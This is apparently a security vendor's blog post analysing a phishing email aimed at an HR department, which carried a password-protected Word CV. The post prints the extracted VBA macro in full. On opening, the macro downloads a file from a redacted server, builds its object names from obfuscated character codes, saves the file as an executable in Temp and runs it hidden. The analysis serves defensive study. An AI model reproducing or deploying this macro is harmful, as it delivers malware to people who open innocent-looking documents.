Malicious Activity: Would You Hire a Hacker?

Would you? One of our client’s HR department received an email containing a CV. The email stated that the attached word document is password protected and provided the password inside the email. The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity.

After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder.

Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
End If
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub


C2 Server IP -
qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC

Learn more about how we protect our clients against malicious activity here.

Learn more about protecting your organization in our detailed guide to cyber security strategy.